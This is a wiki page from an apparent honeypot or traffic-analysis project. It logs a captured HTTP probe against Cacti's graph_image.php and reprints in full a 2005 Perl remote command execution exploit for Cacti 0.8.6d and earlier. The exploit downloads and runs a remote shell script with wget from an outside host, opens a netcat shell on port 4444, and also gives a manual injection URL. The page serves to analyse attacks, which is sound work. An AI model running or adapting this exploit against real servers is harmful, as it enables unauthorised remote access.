[[csni:shellcodes:daun]]
 
Trace: home » csni » shellcodes » daun

Daun

we get the following on port 80: 

00000000  47 45 54 20 2f 63 61 63  74 69 2f 67 72 61 70 68  |GET /cacti/graph|
00000010  5f 69 6d 61 67 65 2e 70  68 70 20 48 54 54 50 2f  |_image.php HTTP/|
00000020  31 2e 31 0d 0a 41 63 63  65 70 74 3a 20 2a 2f 2a  |1.1..Accept: */*|
00000030  0d 0a 41 63 63 65 70 74  2d 4c 61 6e 67 75 61 67  |..Accept-Languag|
00000040  65 3a 20 65 6e 2d 75 73  0d 0a 41 63 63 65 70 74  |e: en-us..Accept|
00000050  2d 45 6e 63 6f 64 69 6e  67 3a 20 67 7a 69 70 2c  |-Encoding: gzip,|
00000060  20 64 65 66 6c 61 74 65  0d 0a 55 73 65 72 2d 41  | deflate..User-A|
00000070  67 65 6e 74 3a 20 4d 6f  7a 69 6c 6c 61 2f 34 2e  |gent: Mozilla/4.|
00000080  30 20 28 63 6f 6d 70 61  74 69 62 6c 65 3b 20 4d  |0 (compatible; M|
00000090  53 49 45 20 36 2e 30 3b  20 57 69 6e 64 6f 77 73  |SIE 6.0; Windows|
000000a0  20 39 38 29 0d 0a 48 6f  73 74 3a 20 XX XX XX XX  | 98)..Host: XXXX|
000000b0  XX XX XX XX XX XX XX XX  XX XX 0d 0a 43 6f 6e 6e  |XXXXXXXXXX..Conn|
000000c0  65 63 74 69 6f 6e 3a 20  43 6c 6f 73 65 0d 0a 0d  |ection: Close...|
000000d0  0a                                                |.|
000000d1

we guess this exploit was used. 

# Note:
# This exploit contains backdoor shell code that is not located on this server.
# /str0ke 
 
#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <= 0.8.6d
#
# This exploit open a remote shell on the targets that uses Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting --> http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a
# Patch: download the last version http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero
 
use LWP::Simple;
 
print "\n\t===============================\n";
print "\t= Exploit for Cacti <= 0.8.6d =\n";
print "\t=      by Alberto Trivero     =\n";
print "\t===============================\n\n";
 
if(@ARGV<2 or !($ARGV[1]=~m/\//)) {
   print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0 www.example.com /cacti/\n";
   exit(0);
}
 
$page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for local_graph_id";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_start=%0acd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl%0a");
print "[+] Exploiting request done!\n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";
 
# milw0rm.com [2005-06-22]

todo:
determine normal cacti behaviour, reply correctly, see what happens

 
csni/shellcodes/daun.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki